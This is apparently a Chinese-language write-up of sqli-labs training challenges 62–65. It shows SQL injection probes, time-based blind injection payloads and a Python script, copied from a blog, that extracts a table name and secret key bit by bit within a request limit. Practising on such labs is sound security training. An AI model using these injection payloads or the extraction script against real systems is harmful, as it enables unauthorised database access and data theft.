sqli-labs(62-65)-challenges-盲注

62 130步内获得flag-时间盲注

130步!有点太小瞧我了吧(歪嘴)

1.?id=2 and 1=2显示,不是数字型

2.?id=2'不显示

3.?id=2' and '1'='1显示1的查询结果,说明有括号,且是单引号.

盲注:

• 表名是10个随机字母加数字

• 字段名是secret_+四个随机字母或数字

• 密码是24位随机字母数字

最坏情况盲注次数是:(10+4+24)*34=1292次,但是要130步内获得,用burpsuite​暴力猜解是不行了

可以手工二分法猜那么最坏情况是:(10+4+24)*5=190次

如果采用嵌套查询,就不需要获取表名,再使用二分法,那么最坏次数为:(4+24)*5=140次,显然很接近130次了

手注

获取表名

?id=1' and if(substr((select char_length(concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c))),1,1)='1', sleep(3),null)--+

或者使用下面的语句缩小范围

• ?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)>'o', sleep(3),null)--
• ?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),2,1)>'m', sleep(3),null)--+

经过几次尝试就可以获得表名

不猜表名,使用嵌套查询

select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select group_concat(table_name) from information_schema.tables where table_schema=database());

脚本

sqli-labs靶场Less-62题解（少于130次） - 简书 (jianshu.com)

菜鸡还不会写脚本,网上扒拉了一个

只能说大佬太强了,60多次就整出来了

#!/usr/bin/python3
# -*-coding:utf-8-*-

import re
import requests

url = "http://www.test.com/sqli-labs-master/Less-62/index.php"  # 改成你的地址
try_count = 0

def extract_bits(query, i, bit_values: list):
    """
    获取query执行结果的第 i 个（从1开始算）字符的3个比特
    哪3个比特由bit_values指定
    """
    global try_count

    assert len(bit_values) == 8
    bit_marks = 0
    for v in bit_values:
        bit_marks |= v

    payload = """
    '+(
SELECT CASE ASCII(SUBSTRING(({query}), {i}, 1)) & ({bit_mark})
    WHEN {0} THEN 1
    WHEN {1} THEN 2
    WHEN {2} THEN 3
    WHEN {3} THEN 4
    WHEN {4} THEN 5
    WHEN {5} THEN 6
    WHEN {6} THEN 7
    ELSE 8
END
)+'
    """.format(*bit_values[:7], query=query, bit_mark=bit_marks, i=i)
    payload = re.sub(r'\s+', ' ', payload.strip().replace("\n", " "))
    # print(payload)

    resp = requests.get(url, params={"id": payload})
    try_count += 1

    infos = ["Angelina", "Dummy", "secure", "stupid", "superman", "batman", "admin", "admin1"]

    match = re.search(r"Your Login name : (.*?)<br>", resp.text)
    assert match
    assert match.group(1) in infos
    bits = bit_values[infos.index(match.group(1))]
    return bits

def extract_data(query, length):
    """
    获取query查询结果的length个字符，每个字符只获取其第7位和前5位
    """
    res = ""
    for i in range(1, length+1):
        b2 = extract_bits(query, i, [0b00000000, 0b00000001, 0b00000010, 0b00000011, 0b00000100, 0b00000101, 0b00000110, 0b00000111])  # 00000111
        b1 = extract_bits(query, i, [0b00000000, 0b00001000, 0b00010000, 0b00011000, 0b01000000, 0b01001000, 0b01010000, 0b01011000])  # 01011000
        if b1 & 0b01000000 == 0:
            # 该字符为数字
            bit = b1 | b2 | 0b00100000
        else:
            # 该字符为字母
            bit = b1 | b2
        res += chr(bit)
    return res


if __name__ == "__main__":
    table_name = extract_data("select table_name from information_schema.TABLES where TABLE_SCHEMA='challenges' limit 1", 10)
    print("table_name:", table_name)

    secret_key = extract_data("select c from (select 1 as a, 2 as b, 3 as c, 4 as d union select * from challenges.%s limit 1,1)x" % table_name, 24)
    print("secret_key:", secret_key)

    print("Done. try_count:", try_count)

63 130步之内-单引号-延时注入

id=2 and 1=2 显示

id=2'不显示

id=2' and '1'='1显示2的查询结果,单引号字符型

注入略过

64 130步之内-数字-双括号

id=2 and 1=2不显示

id=2)--+不显示

id=2))--+显示,数字型,双括号

注入略过

65 130步之内-双引号-双括号

id=2 and 1=2显示

id=2'显示

id=2"不显示

id=2" and "1"="1显示1的查询结果,双引号,双括号

注入略过